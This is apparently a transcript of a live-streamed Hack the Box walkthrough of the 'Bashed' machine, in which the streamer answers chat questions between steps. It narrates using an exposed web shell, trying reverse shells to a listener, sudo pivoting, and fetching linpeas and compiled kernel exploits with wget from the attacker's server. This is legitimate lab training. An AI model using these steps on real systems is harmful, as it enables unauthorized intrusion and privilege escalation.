Alright, so today I am streaming Bashed on Hack the Box. I have never pwned this machine before. As you can see, I have not submitted any flags yet, so this is a brand new machine to me, all new. We call this black box penetration testing when you know nothing about the machine. The only thing that I know is the only thing they give me here, which is it's Linux. It's the only thing I know about this machine. So let's go ahead and open up my terminal here. I'm going to zoom in so you guys can see better. And then we're going to run a Rust scan. Well, I thought I had it on my clipboard. Let me try to paste that again. Paste. Alright, so Rust scan is a very fast port scanner. It uses Nmap in the background, but it's extremely fast. It's a lot faster than Nmap, which is why I like to use it. The way the syntax works is it goes rust scan, which is the command. By the way, this command and this tool isn't built into Kali Linux by default, and you have to actually go to the rust scan GitHub to install it into your system. The installation instructions are on the GitHub. We're not going to talk about how to install, but it is a really useful tool for Hack the Box. And then -A means address, so this is our target IP address. -R is the range, so we're scanning 1 through 65,535, which is all ports. We're going to push enter on that, and then it's going to scan the target machine as fast as possible, which, like I said earlier, is a lot faster than Nmap. And normally we get ports by now, but we don't got nothing yet, so we'll see what this is about. While we're waiting, I do want to say thanks for stopping in. Thanks for being here. I appreciate all the support. Hopefully you guys are getting a lot of value out of these live streams. I get a lot of value out of these live streams because just hacking in general is good to build up your skills, but then when you stream it, I think that helps me out more because I have to explain stuff as I go, and that helps me confirm what I know and when I explain stuff, and also get a lot of tips from you guys in the chat too, so that's pretty nice too. It helps me learn some. I learn a lot from you guys as well. What's up, Charles? We're gonna stream. Thanks for stopping in. Glad to see you here. What's up, Brendan? Thanks for stopping in. You guys are awesome. Thanks for being here when I start. Wi-Fi Addict, what's up? How you doing today? Wi-Fi Addict asks, do you plan on finishing taking the OS EP? For those that don't know, that's the offense security experience penetration tester. Yeah, I want to, man. I really do. That's a beast certification, man. That is extremely difficult. I took the course twice now, and it kicked my butt. It kicked my butt. And when I was making my military transition, I found out that web apps are extremely popular in full-time penetration testing roles. So I stopped with the OSEP and started pursuing the OSWA. That's the Offensive Web Assessor, and that's why I stopped the OSEP. I did the OSWA course completely, the course plus the challenges. With the OSEP, I did the course only, but not the challenges. And I actually took the OSWA twice now, and I failed it both times. The first time I came extremely close to passing. I was only a couple flags away. And the second time wasn't a real attempt, because the second OSWA attempt, that was the day I got my job offer for my current position. So I accepted that job offer in the middle of my exam. And then after I accepted that job offer, I had to sign a bunch of paperwork. So I spent very little time on my second exam. I was like, you know what? If I fail this exam, it's whatever. Like, I just got a job. So that's kind of the whole point of having a certification anyways. So if I fail this, it doesn't matter because I got the job. And because I have OffSec Unlimited, so I have unlimited retries up until my OffSec Unlimited expires, which is in March. So I don't know why my Rust can just blanked out here, but it didn't find any open ports, guys. That's a little strange. Let's do --u limit 5,000. See if that changes anything. If that doesn't work, then we're gonna have to do old-fashioned nmap scan. So our scan looks like it dropped the ball here a little bit. What's up, Ian Kent? Welcome to the stream. Thanks for stopping in. Which certification is good to learn for penetration testing? Man, there's a lot of them out there. I would start with either the EJPT, that's what I did, and I can speak highly of that certification, or I think it's a better value deal, go for the TCM Security Junior Penetration Tester. I didn't do that. I haven't done that course, and I haven't done that certification exam, so I can't tell you exactly what's on it, but from what I've seen and what I hear, it's a really good certification, and it looks like it's going to be a little bit better than the EJPT. Because the EJPT's got multiple choice questions. Dude, my Rust scan didn't work again. Let's do an old-fashioned nmap scan. We're going to have to do nmap, guys. I'm going to explain what this nmap command does. Here in a sec. Alright, so nmap -p -p just means we're scanning all ports. -ss means we're doing a SYN scan, also known as a stealth scan. Basically, they're half connections. It's not making a full connection. And the reason why I specify that on a full port scan when I'm trying to scan every port is because since it's a half connection, it's faster. It's not making a full connection, so it goes by a little bit faster. -t is the speed on which you're scanning at. It goes all the way to -t5. And in this case I'm doing -t4, so it's like the second fastest speed for nmap, and the default speed is 3, so if you do -t3 it's the same as doing no -t at all. So when you do a -t4 you're increasing the speed a little bit but not all the way, and the reason why we don't want it all the way is because if you do a -t5 you're likely to miss some ports that are open, and we don't want to do that. We want to know what ports are open, and I've never seen -t4 miss a port, so T4 is very reliable, whereas T5 is very unreliable. -pm means we're skipping pings because we know... Oh my gosh. I just realized why my Rust scan wasn't working, guys. I forgot to connect to the Hack the Box VPN. That's why it's not working. Anyways, -pm means we're skipping pings. I was going to say, the reason why we're doing skip pings is we know the target machine's up, and I was like, oh, I didn't verify the target machine was up. And I was like, I didn't even connect to the VPN, so that's why Rust scan wasn't working. So -pm means we're skipping pings. You would do that if you know the machine's up, and most Windows machines, and actually Windows machines by default will not reply to ping, so you wanna include this almost every time if you know the target machine's up. And then Linux machines can be configured to ignore pings, but typically they don't. And then you just put your target IP address. So let's actually not run this command. Let's just run the Rust scan one more time, guys. That was really unfortunate. I forgot I connected the Hack the Box VPN. That's funny. So we got port 80 open. We're gonna run Rust scan again. That's how fast it was, by the way. We're gonna run Rust scan again. See if we get the same results. Because Rust scan is so fast it can miss ports, so I like to run it more than once. I would like your opinion on all my certs. Man, that's like that would take all day. That would take all day because I have 13 certifications. But that's an interesting YouTube video. I'll keep that down. I want to write down my notes. I might make a YouTube video on that one. That would take a long time. Yeah, let me add that to my notes. That's a good video idea. That might not come out for a while though, because that's a lot of work. But I'll give you a general overview. For all my certifications, like I have them for a reason. I think they're all worth it, if that makes sense. I wouldn't have got them if I didn't think any of them was worth it. Some are worth more than others, but every cert that I have was is definitely a good certification to have, which is why I have them, and that's why I advertise them on my resume. What's the key topics in defensive cybersecurity? That's also a huge question. That's a lot there. I mean, like incident response, SOC analyst, cybersecurity analyst. There's cybersecurity engineering. There's governance compliance, GRC. There's a lot that goes into the defense side of security. What's Rust scan? Why not mass scan or nmap? You know, mass scan is also a facet port scanner. Rust scan is, I would say Rust scan is faster than mass scan. I don't know. I haven't done any tests, but I do like Rust scan. Nmap, I like nmap and I use nmap, but it's slower, which is why I don't use it when I do hack the box. I will use nmap. Actually, right now we're going to use nmap right now because now that I know that port 80 is open, I like to feed my Rust scan results into nmap. Let me pull up my nmap command here. Alright, so we know port 80 is open, so we're just gonna run this command here. Let me fill it out real quick. Get the IP address, paste this here, and ports. We only got port 80 open. So what this command here is doing, so we're running a regular nmap. -st, so it's the opposite of a -ss. A -st is a full connection, also known as a TCP connection, also known as a TCP scan. -a is a combination of -o, -sv, and -sc. I like to include all these anyways because if you include just -a, it isn't as comprehensive as including all of them. So if I do all of this, it's the most comprehensive possible, because if you just do -a and you don't include these, you're going to get slightly different results. And in my experience, if you attack these on anyways, then you get more information, and I'm always all for getting more information. Rust scan does use nmap, that's right, that's actually right. What's up, WireDogSec? Thanks for stopping in. Flying Squirrel Man, welcome to the stream. Thanks for stopping in. How you doing today? UK Sega 16-bit, thanks for stopping in. How you doing today? You're Squirrel? Nice, nice. Thanks for stopping in. What's up, WireDogSec? I think I already said hi to you, but if not, thanks for stopping in. Alright, back to what I was saying. So, I like to throw in all these at once. -O is operating system detection. -S, capital V, is service version detection. -SC is the nmap scripting engine. It runs like the most common scripts. And then -- script vuln is the vulnerability script, which isn't included in -SC. -PM means we're skipping pings. -P means we're scanning whatever after that. So it's port 80 in this case. And I did not mean to copy that. And then our IP address. So we're going to scan. We're basically only scanning port 80 here. It's a very comprehensive scan on port 80, but since we know it's port 80, we can actually navigate. Let's get our IP address. In our browser, we'll paste the IP address and see what's on port 80. So we got Erexel's development site here, and looks like we just got a website here. So this is, there's definitely a vulnerability here because this is the only thing that's open. The only port. I mean, unless Rust scan miss ports, which is very possible. So we got index, HTML, PHP bash. PHP bash helps a lot with pen testing. I have tried it at multiple different servers and it's very useful. I actually developed it on this exact server. Let's click on that. Okay, well this looks like a huge vulnerability right now because looks like we can run commands somehow from here. And this is the Etsy password. So he's giving us an Etsy password of the machine. I don't know if this is this machine or if it's a different machine, but You shouldn't have included that in the output here. I don't. Print working directory. This gives us the file directory. This is a lot of information here. There's a huge vulnerability here. PHP bash helps a lot with pen testing. So it's a pen testing person. Oh, he made a tool. I have tested on multiple different servers and it's very useful. I've actually developed on this exact server. Okay, he's got a GitHub here. Oh, okay. So this guy made a tool. It's an actual tool. Okay, this is an actual pen testing tool. Did he make this box? Who made this box? Let's get a machine info. Who made this box? Is it this guy that made the tool? Or do I get the author for the box? I don't know why it's not telling me that. Where do I get the author of the box at? Usually you can... Alright, well... Semi-interactive web shell. So there might be a web shell on the server. ST isn't necessary when using -- script? Really? Interesting. I always thought it would be... Oh yeah, created by ARXL. Yeah. So the guy who made this tool created this box. And he's like, you know what? I'm gonna advertise my tool to the Hack the Box community. That's a baller move right there. I ain't gonna lie. That's pretty cool. It's a very popular tool too, as well. Look, 864 stars. But I don't know how to use it. Like what? Oh, it's a web shell, dude. That's really cool. This is a cool tool. I like that. I like that a lot. Might have to try that out, guys. If we find a way to get like upload a web shell, we should try this. What's up, content lemur? We're gonna stream. Thanks for stopping in. Hey, nice work. I've had a very serious question. I am just now starting doing try hack me, etc., and it's really good. But to be honest, I forget most of the thing I learned in a room. I mean, yeah. That, I mean, I've had similar issues where you go through a room and you kind of just forget. And there's two ways to solve that problem. Number one is write notes on everything. So one thing that I wish I would have done when I was going through try hack me is I wish I would have wrote down notes as I was doing the rooms. But I actually had to go back. And I didn't redo every try-hacker room from start. However, I did go back to every room that I did and skim it and get notes for all the commands. So specifically the commands and the tools is what I would write down, because I can't remember every single command. I can't remember every single flag for every command. So it's super important to write that stuff down. So that's what I would say. As you're doing rooms, and as you learn stuff, just write down what you did and put it in your notes. So, you know, if I run across a new exploit that I've never seen before, then I'm gonna put it in my notes, and then I always have it. And then the second thing is to help with that problem is you just get better with reps. So just keep doing the things, because you're gonna see the same type of skills keep reoccurring over and over, which is why I do try hack me every single week, because it keeps my skills sharp, and I can't forget it if I use the skills every day or not every day, but at least once a week. You know what I mean? I do actually do it every day because I'm a full-time pen tester. But yeah, it's just you want to keep doing it over and over. Yeah, like Wi-Fi addict said, repetition is key to success. If you do something long enough, you get better at your craft. Yeah, that's facts. You actually record a voice on yourself and how to do it. That's one thing. I've never. I mean, I make my YouTube videos, but hardly ever do I reference my own YouTube videos. I keep everything in my notes, and I'll make notes. If as I learn stuff in this, I'll put notes in my note keeping app, which I just use a Microsoft OneNote. If you guys are wondering what notes I use, I don't do nothing fancy. OneNote is good enough for me. Okay, so this is just a tool he's advertising. I don't think there's a vulnerability here. I thought maybe this was, but I don't think. I mean, it could be. That could be a hint. That could be a massive hint. There could be a web shell somewhere. So let's keep looking. Twitter's got nothing. YouTube, no, I can't click on any of these. All right, so there's literally just one page. Load more entries. Nope, nothing there. Let's go here. Development. Nothing here. So the only post he has is about PHP bash. Let's do it. Let's fuzz this, guys. We got our nmap results back. Let's fuzz this first. Let's do Buster. So Buster's another tool that's not built into Kylax by default that I like to use, but it's very similar to GoBuster and DirbBuster and Dirb. But once again, I believe it to be faster, so I use it. All right, let's grab our IP address here. Oop, cancel that. We're not on HTTPS, we're on HTTP, so we gotta get rid of this S here. And we'll see what happens after this. Yeah, no problem, content link. We're glad to help. Yeah, I hear what Obsidian does. A lot of people, they like using Obsidian. I'd run the FFUF for content next. Yeah, you're probably right. I mean, that's what screwed me over last stream was Buster wasn't catching what I needed. So I've learned that Buster isn't the end all be all when it comes to fuzzing. So we got a directory listing here, so let's check that out. Let's go to /uploads. Alright, well that's interesting. We didn't get an error, but it says blank. There's nothing there. Let's get a /php. Alright, sendmail.php. This is a script. Images, upload, dev. Let's go to images maybe. Just a bunch of PNGs, nothing crazy. All right. The CSS stuff /dev might be interesting. Oh, look, /dev PHP bash. Oh, look at that. Let's see what this is. So this was his tool. So this is how he would run the web shell. Is the web shell already built into this? The web shell might be already built into this. If it is, then we might have an easy way to get access here. Let's go to his tool and see how to run his tool. Because I do remember seeing, yeah, simply drop the, so drop this file on the target and access it with your JavaScript enabled web browser. So he went to uploads /php bash.php. It didn't work though. Let's not do .min, let's just do .php. It's there. Oh, here it is. It's down here on the bottom. I can just run commands. This is easy, dude. We can just run commands already. Wow. Alright, this is super easy. So, the reason why it's super easy because I can just run any command I want. So I can do who am I? You can see I'm www.data. I can do an ID here. So I already have a shell. I already have initial access, matter of fact. So it'd be interesting if we can get the flag from here. Let's do change directory /home. Change directory ARREXEL. I can go into this directory. No way. There's the user flag already, so we can do cat user.txt. Oh, there's no tab autocomplete, guys. This is a web shell after all, not a real shell. There's a user flag. Wow, that was one of the easiest flags I've ever seen in my life. Super easy. That was a piece of cake. Alright, now we gotta figure out how to elevate our privileges. Let's go back to that web shell. Close out of this. Close out of this. So we gotta figure out how to elevate our privileges to root. So if we do like a sudo -l maybe. See if that does anything. So we can run anything. We can run any script manager as root. This is a full-fledged shell almost. This is a very good tool, by the way. Like if you can upload this to a target. Now the vulnerability here is with the way, like this was already built into the machine, but this tool is really cool because if you can get this onto the machine somehow, that would be killer. This is a cool tool. Rev shell then linpiece. I don't even think we got to do that because look, I can run anything script manager. I can run script manager with no password, which is let's just run script manager. Script manager. Let's just type that in. Matching default entries for data on bashed. And run the following commands on bashed. Script manager -h. Is this a tool or what? Script manager not found. What's the command? Is it locate? It tells you the location of something? No. Is it where? It's where, right? Where manager? Which, thank you. Thank you so much. I know something like that. Which script manager. Well, I gotta spell script manager correctly. I can even do the up arrow keys. That's pretty cool. Man add manager. Is that right? It says so. That's kind of weird how it says I can run script manager with no password, but then when I try to run it, there's nothing there. Sudo-u script manager bin bash. I'll try that out. I might need a regular shell for this. Let's get a regular shell here, and then we'll try that again, because this isn't a real shell. So let's well, can we do switch user root? Must be run from a terminal. Yeah, okay. Alright. Let's take advantage of this. So basically all we gotta do is go change directory /tmp to temp directory here, and we're gonna upload a reverse shell here. We're gonna do a new tab here. Alright, so let's make a reverse shell. Actually, we don't even need to do that, guys. We're overcomplicated. Let's do a netcat here, LNVP 443. So we're gonna listen on port 443 for a callback, and we're just going to run a simple command, which should give us a reverse shell. We don't even gotta upload anything. We just gotta run a command. Let me just grab it out of my notes here. We're just gonna paste this here. So port 443 and then our IP address. My IP address is 10.10.16.29. So here's our command that we're running here. Basically, we're just calling bin bash. And it's calling back to our listener, right? Our IP address 10.10.16.29. Yeah, that's right. On 443. So this should give us a reverse shell. So we're gonna push enter on that and see what happens. We didn't get nothing. Okay, not a big deal. Not a big deal at all. Here's a different way to do this. There's multiple ways to do this one. Sometimes some work, sometimes other ones work. So this is a very similar thing here, just a little bit different. So port is 443 and IP address 10.10.16.29. Let's try that. Did we get anything? Nothing. I think you're missing the initial /bin bash. Really? Oh, maybe I did. Maybe I need. Oh yeah, you're right. I do need to do a slash in front of that, right? That didn't work either. Alright, that's okay. There's still multiple ways to do this, guys. Believe it or not, there's still a bunch of things we can try here. Alright, so this is using curl. Sometimes this works as well. So do 29. Try that. That didn't work either. Alright. Just keep going on the list. Got lots of tricks to try. Alright, I think I am actually out of tricks. Well, not out. But we gotta go to rev shells. I don't write these down because it's on rev shells. All those I just tried wasn't on rev shells, so we'll just do a regular bash here. Let's try this. Our IP address is 29. So we will copy this. We want to bash. Okay, this looks good. Let's go back over here. let's run that. Let's go back to our listener. Oh, I closed out of my Roxbuster stuff. Can I even ping my Kali box? That's a good question. Ping 16. Well, it didn't show up on my terminal here, so let me try this. All right. So we can detect we can listen for pings, or like we can watch for our people pinging us if we just do one of these. So TCP -I tunnel 0, because that's my IP address I want to listen on. ICMP and ICMP, that's the command. So we're gonna run that, and we are getting pinged. We are getting pinged from the target 33-17, right? 33. Yeah, we're getting pinged. So that worked. The ping worked. And I can't stop the ping, I don't think. I think I'm going to get pinged forever now. I want to get pinged forever. What's up, Anonymous? Anonymous, we're going to straighten things stopped in. Please, can we have access on a tutorial on this? What do you mean by access on a tutorial on this? I'm doing the hacking live, so this is kind of like a tutorial, but what else would you need? I'm not sure what you're asking. What's up, GW? Is it an ant? Are you using a virtual machine? I am using a virtual machine. We're gonna close out of this. We are getting pings, so there is connection here. Let's go back to rev shells, guys. Let's do netcat-e. Let's try netcat. Netcat might be built, should be built in the machine. We'll paste this. This is an netcat from. Invalid option E. Wow. So there's netcat on the machine. Invalid option -E. I don't know how that's an invalid option. This is netcat from netcat OpenBSD package. An alternative netcat is available in the netcat traditional package. That's interesting. I don't know what that means. Can I type in just netcat? I don't know what that means. I don't know why the -E doesn't work if it's really a netcat. What if we do incat? Maybe incat's there. No, incat not found. Python on this? Python 3? Python? Let's do Python 3. Let's see if that works. I keep going to my terminal because I'm running commands, but I keep clicking on thing because this is actually in my browser. Let's run that, see if that works. That worked. Boom, baby. Python worked. So, to recap, Python 3 number 1. that rev shell, this worked. So we got access here, as you can see. Now I'm going to stabilize my shell. So in order to do that, we are going to run Python 3 again. We might not have to do that, but I'm gonna do it anyways. This might not be necessary because we just ran a Python command, but we'll try it again. And then we're going to stabilize the shell with export term equals x term. And then we want to background with control Z, and then paste scdt raw dash echo semicolon foreground. Looks like, okay. We got a stable shell here, or at least stable enough. We're still data, which we didn't, yeah, that's what we expected. But now we have a real terminal here now. So with that in mind, we can actually clear out because I just stabilized it. Let's try running what we ran earlier. So if we do like su root, it should let us, yeah, see, password. It's gonna let us run that. We don't know the password though. That doesn't really useful, but let's try what Wi-Fi Addict told us to do earlier, which was, I don't know, where was it at? Here it is, sudo-u script manager bin bash. That, now we're script manager. Who am I now? We're script manager, so we just elevated our privileges to script manager. ID. All right. So script manager wasn't a command, that was a username, right? So if we do cat / password, yeah, script manager is a user on this machine. So we elevated our privileges from AAR Axel to script manager. So if we do change directory home here, ls, so yeah, script manager, that's a user. So that's why that works. So when I saw this script manager, I thought that was a command. This is actually a user. So that's why this works. Alright, so that makes sense. But it's still not root though. And we already got the user flag, so we got to figure out how to elevate privileges again. So let's go ahead and clear this out. And we will do a sudo-l again to see what permissions we have as script manager. We don't know the password for script manager though. So that's a problem because we don't know the password. Okay, so that doesn't really help us. But script manager being a user that runs scripts leads me to believe that there's going to be some scripts in a script manager home directory. So let's see. There's nothing in the script manager home directory, really. Nothing there. Wow. All right. Let's go change directory back to the root. Yeah, can't go in the root. Well, the only thing I can think of now is just to run some linps and just see what kind of output we get here. So let's upload linps. Let's go change directory tools. Oh, change directory. Why can't I do change? No such file as directory / tools. I'm confused, guys. Oh, because it's got to be a capital T and there don't put a slash. Okay, there we go. And so you can see we got linps in here somewhere. It's in alphabetical order and I still can't find it. linps, there it is. Linps right here. So we just gotta upload this. So in order to upload this, we're already in the right directory. We just need to run a HTTP server to serve this to make it available to download. So what we're gonna do is we gotta do Apache, apt Oh, I can't think of the command right now. What? I'm drawing a blank. Here we go. Systemctl stop Apache 2 because it runs automatically. I need to have this stop before I can run an HTTP server. And then I'm going to run a Python 3 HTTP server. So Python 3-m http.server. And I'm going to host it on port 80. Basically what we're doing is this entire tools directory. So all of these files is being hosted on an HTTP server. To further show you what I'm saying here. So if I go to a web browser on any computer on this network, so basically just my Kali Linux box has access to this, and then so does the target machine because it's on the same network. But if I do, if I go to http://10.10.16.29, it's going to take me to my HTTP server, and right here, that's all my tools. So I can serve up every one of my tools on a web server, and like I said, anybody on this network can just download any of these now, and that's all we're doing right now. And in order to get this downloaded, so I'm gonna actually stop this, and we're gonna run this again because I want to make it very clear. So it's nice and clean slate here, and we're going to go back over to the web shell on the target, which is the script manager, and all we're doing is we're doing a wget, which is a tool to download stuff from the internet, and we're going to do http://10.10.16.29/linpeas.sh. Push enter on this, and you see it says permission denied. Let's do change directory /temp. We'll go to the temp directory. Let's try that one more time. What's up, Ghost? Welcome to the stream. Thanks for stopping in. Glad to see you here. I just started cybersecurity a few months ago, so I need anything I can lay my hands on for starters like me. I would say TryHackMe is the best start. Start with the easy stuff on TryHackMe and work your way up. And then once you complete all of the learning paths on TryHackMe, then you're going to want to migrate over to Hack the Box. And that's my advice. This is Hack the Box, so this is a little bit more. And even though it's an easy machine, yes, it's an easy machine. This is still a little advanced, but I'm trying to explain it the best I can. You definitely need to know Linux. Alright, so we're uploading this limpy, so let's do this command one more time here. Copy selection. So if we go to my HTTP server, this broke. Why did this break? Not sure why that broke. Let's do ls again. Did I spell limpies wrong maybe? It's just linpeas.sh. Alright, let's do the HTTP server again. Let's try this one more time. linpeas.sh. Yeah, I don't know. Let's try that one more time. Oh, that worked. Oh, okay. We just couldn't write to the script manager. So script manager couldn't write to it. Script manager's home directory, which is weird, but it wrote in the temp directory just fine. So if we do ls here, you can see we got linpeas.sh. And if we go to my server records, you can see that we got a status 200, which means success from the web server. Linpeas.sh was downloaded. So linpeas is on the target now. We can actually close out of my HTTP server because we're not uploading. If we need to upload again, we can always just start it up again, but I don't like to let it run if I don't need to. And then in order to run linpeas, we need to do a chmod, so that's change mode plus X, which is making it executable, and then we want to do linpeas.sh to make linpeas executable, and then to run it we just do /linpeas.sh, and then boom, linpeas is running. And if you don't know what linpeas means, what does peas mean? So lin means Linux. Peas means privilege, escalation. What does the P stand for? It's privilege escalation something. I don't know what it means. Yeah, P's just means privilege escalation. So there's like WinP, so that's Windows privilege escalation. And there's some other types of P's out there too, I think. But basically, as the name implies, is we're looking to elevate our privileges to root here. And it's a very good tool, both WinPs and LinPs. Obviously, you run LinPs on Linux, you run WinPs on Windows. They're different tools because they're different operating systems, but they work very similar. And basically, privilege escalation, awesome scripts. Thank you. The very technical term of awesome. How could I forget? So anything that's red and yellow is obviously something that we need to check out. Anything that's red is something that... So basically, I just look for things that are red, things that are yellow. So we got a Linux version here. That's interesting. That might be an attack vector. Pseudo version, you know, that's a low version, so there might be a PE vector here. Linux. Pseudo part 2 load. Is this on Kali or we have it on GitHub? Yeah, it's on GitHub. Let's keep scrolling here, see if there's anything that's like red and yellow that sticks out like a sore thumb. There's some CVEs. 30 cal, that might work. I've used 30 cal in the past. 30 cal too. These are all CVEs that it's finding. These don't always work, but usually when I get these, I usually just start from the top and work my way down and try them out. Executing Linux exploit suggester, AF packet. So exploit suggester is get wrecked. So we can try these too. Doesn't mean it's gonna work, but we're just gonna keep scrolling here. We're gonna take what I would think is the best option and then try the other ones out. So scripts is always nice to look at, especially okay. This is the shell that we just opened up, guys. Oh yeah, there's one for Mac OS too. The full name is Peas NG Privilege Escalation Awesome Script Suite New Generation. Process 1413 is run by user script manager, but the PPID is root. That's interesting. That might be that might be our shell actually. I'm assuming that's our shell. Used with the console root. This is our console right now. What we need to check, guys, is let's also give this a check here. Let's go to github.com. Let's go to my GitHub. We'll go to repos. We will go to hacking nodes, and we will go to privilege escalation, Linux. And I usually like to go down this list as well. We're going to search for SUID bits, see if there's anything here. We're going to keep scrolling down though. But usually by the time this point comes down, PAM, I'm not seeing anything interesting here. Sometimes I wish it didn't highlight so much red, but check if the pseudo version is vulnerable. We are going to do that here in a minute. We got a lot of things we can try here. So we're in a good spot. We're going to check for the SUID bits. So I can't remember. So bin SU. Let's go to GTFO bins. GTFO bins is basically some ways to get privilege escalation on Linux, and we're actually going to, come on. Sometimes I hate my VM. I like moving my windows around and stuff. We're going to make this small so I can work side by side. Normally I would put this on my other monitor, but I want you guys to be able to see what I'm doing. Alright. So we have, so normally I like the amount, F user amount. I don't think that's SU. Not sudo, that's, we need SUID. NTFS, nothing there. CHSH, nothing there. New group, I don't think that's, yeah. Sudo, you gotta have sudo. CHFN, nothing. Passwd. Passwd, nothing. G, no. VMware, no. dbus, nothing. dmcrypt, nothing. I think this is all the standard stuff. Yeah, there's no SUID bits that we can exploit here. Okay, well, it was worth checking that. Let's try these CVEs that popped. These are probably our best bet, or maybe the sudo, or the sudo version. We can do like a kernel exploit. Oh yeah, let's check the sudo version. Let's check the sudo version here. sudo version 189 exploit. I've searched this before. Did I just search this earlier today? No, I didn't search this earlier today. 180. This looks like it might work, guys. Sudo 180 to 191 privilege escalation. Well, it's on exploit DB, so we know we can trust it. So I'm just gonna copy this code, guys, and I'm going to just send it, full send. So we're gonna do a nano exploit.sh, run this, or paste the exploit in here, and then we're gonna do chmod plus x exploit.sh. I don't know what happened to my terminal just now, but we'll do /exploit.sh. Password. I need a password? I don't know the password, guys. Dude, what the heck just happened to my terminal, bro? Clear. Alright, there we go. What just happened? Chmod 755 exploit // and exploit.sh. I still need a password for script manager, which I don't have. Because they're running as root. Is there any way we can run this as? What? To run? Oh yeah, it needs to run sudo edit. Do I have to proceed anyways? Let's do yes. Yeah, it didn't work. Yeah, it was worth a shot. You're right. It's always worth a shot. Alright, well, let's go ahead and, yeah, it doesn't have sudo edit as root. This just can't run sudo edit as root. If we had the password for script manager, it would have been game over. I think it would have worked. Let's go back to script manager's home. We did an ls, but we didn't do an ls-la. Maybe there's some hidden stuff in here. Let's do cat.bash history. Cat.bash rc. I don't know why I did that. It wouldn't. Why is there nothing in the bash history, dude? Didn't there be stuff? ls/la cat dot. Oh, because I gotta do cat dot bash history. Maybe I did that. Oh, there's nothing there. Interesting. GNU PG. I don't know what that means. Cat dot nano. Nano's oh, change directory dot nano. There's nothing in here. All right. Let's go back to our. Oh, I cleared. No. Yeah, I cleared out my terminal. Oh my gosh. We gotta run limps again, guys. Mistakes are made. Let's run limps again. Change directory /temp /limps. Alright, let's go back up here. Let's see if there is. Linux version exploit. Linux kernel 4.4.0 Ubuntu. That's exactly what we're running here, so this is really good. DCCP double free privilege. I don't know what double free means, but this looks like this might work. But it needs GCC. Do we have GCC on the machine? Can we compile this? GCC is currently not installed. We might be able to compile this on our machine and then transfer it over. So let's try that. So we're gonna actually change directory to hack the box. Yep. Change directory. Hack the box. Make directory. Name of this machine is what? Bashed. Change directory to bashed. We will do nano exploit. Well, what do they call it? Oh, just do exploit.c. I think it's C, right? Is this C? Yeah, it's C. They call it POC here, so we'll just do that, POC.c. And we will copy this code. Boom. Go X, Y, enter. And we will come back over here. So basically, we just gotta run gcc poc.c-o pwn. There we go. So pwn might work if we transfer it over. So let's do that. So let's do, we're gonna host a web server on this bash directory here, and we're just gonna put pwn on our target. So we will do wget http ://10.10.16.29/pwn, and that uploaded successfully. You can see pwn. So if we do chmod plus x pwn to make pwn executable, you can see it's blue now, so we can do /pwn. See if that works. Not found required, so that didn't work. Yo, welcome to the stream. I'm just gonna call you Shooter. You got a very inappropriate name, so I'm not gonna say it. But thanks for stopping here. Thanks for being here. CrowdStrike 2 engage. I don't even know how. Why did YouTube even let you have this name? I don't understand. Oh, that's funny. Yeah, it cracks me up, man. I can't. I keep the stream PG, but you got a funny name. You're robbing a bank, bro. Don't rob banks, guys. If you're watching the show, don't rob banks. It's not good for anybody, unless you get away with it. I'm just kidding. Don't just kidding. Don't rob banks. For legal reasons, that was a joke. NSA, I know you watch my streams. FBI. Alright, back to trying other exploits. Okay, there's other stuff we can try here. It's not like we're starved here. We're just trying to find some stuff. Well, let's look and see if there's an exploit for this that's not, that doesn't use C. What was the error? It was, let's scroll down. It was saying I was missing some kind of dependency. GLIBC 2.3.4 not found. I don't think we're going to be able to install that without root privileges, so I know I wasn't going to try to figure that out, because one, I don't think we're going to be able to install the GLIBC 2.3.4 without being root. You know, if I was root, you can probably do that, but I'm not root. I mean, correct me if I'm wrong, but that's just what I'm thinking. Go back here. So this is a self-contained exploit. Should work out of the box. Well, let's try that then. So I need to transfer this into my directory. Let's try this. So we would do our wget. Let's do wget. Did that not work? Or is it just taking a long time? Did that work? Pwnekit.sh. Oh, that worked. So if I do, let's serve pwnekit.sh here. And let's go back over here. So let's run this command here on script on the target here. Oh, that's really weird. Let's pull my notepad. We're gonna paste this here. So we're curling http:// this is our IP address, so 10.10.16.29/pwnekit.sh. Let's see if this works. Curl's not installed. Curl's not installed on the target, bro. That's wild. Alright, well, that was worth a shot. Alright, let's try something else. Exposure, highly probable. Let's do dirty cow, because why not, right? I've used dirty cow in the past, and it's a pretty common and it's a pretty significant vulnerability, so we can probably do this. Let's exploit dirty cow. What does this use? It also uses C, guys. But if it doesn't use the bad library, then we'll be alright. Is this C? I think it is. Yeah, it is. Compile with. Alright, well let's just try this, guys. How can I get paid? I'm the one literally finding all these bugs in Google and Microsoft. I mean, I don't know. You gotta do little bug bounties to get paid, man. I get that's the only way I know how to get paid, or find a full-time penetration testing job, one or the other. All right, let's do this. What are they calling it? They're calling it dirty.c, so we will nano dirty.c. And we will Control X, Y, enter, and we'll compile this on our computer, and hopefully it works on the other computer, because normally you want to compile on the computer you're going to run on if you can, but in this case we can't because GCC is not on our target machine, so we have to improvise here. So we'll compile and then run the newly created binary by either doing .c or So we can do ls here, so we can see dirty. So we just got to run dirty. So once again, we need to do we got to upload this to our target. We will do wget http://10.10.16.29/dirty. It was successful. We have a dirty, so we do chmod plus x to make it executable. Dirty, and then ./dirty. Didn't work. We need glibc 2.33. That's the thing that's stopping us, man. Well, we also need this too for this. Well, that didn't work. All right, well, we'll try the next one. That's what's nice about LinPs, is that it just shows you everything, you know, at once. And you just scroll down and try the next thing, and hopefully you find something. DCCP? We tried that, didn't we? We found that ourselves, and we tried to do that. We need to try to find something that doesn't use C, man. Because that's... Yeah, that's what we tried to do earlier. Well, let's skip that one for now, because we actually already tried that exploit. Local pros escalation. This is also C, my dudes. It's very unfortunate because we're missing the stuff to run C, man. I mean, we can try it. It's worth a shot. Maybe some of these scripts doesn't require the libraries that keep giving us an error. So let's do nano. What are they calling this? They're calling it C. They're calling it the CVE number.c, so we'll do that. And we will copy the code, paste, Control X, Y, enter, and we compile like this. We'll just copy this. And then what we want to do is copy this, run our Python server again, and we will transfer this one. And we will do wget http://10.10.16.29/ and then the CVE number here. You can see it's in our directory, so we can do chmod plus x cv CVE. There we go. /CVE, whatever the number is. So can't do it, dude. GLIBC 2.34 seems like it's on almost everything. We gotta find something that's not using C, guys. C, it doesn't look like it's an option. This is very unfortunate. So I want to avoid if it's a C, then I'm gonna not do that anymore because we're getting nowhere with that. Script manager seems like it uses that manages scripts. Yeah, I know. But I couldn't find any scripts though. That's the thing. That's just kind of weird to me. But maybe I just didn't do enough enumeration, man. But I'm gonna keep trying these like CVEs that popped up for LNPs and see if I can get something. But welcome to Stream Clay Hacks. How you doing, man? What's up, Sabler? Welcome to stream. Thanks for stopping in. From 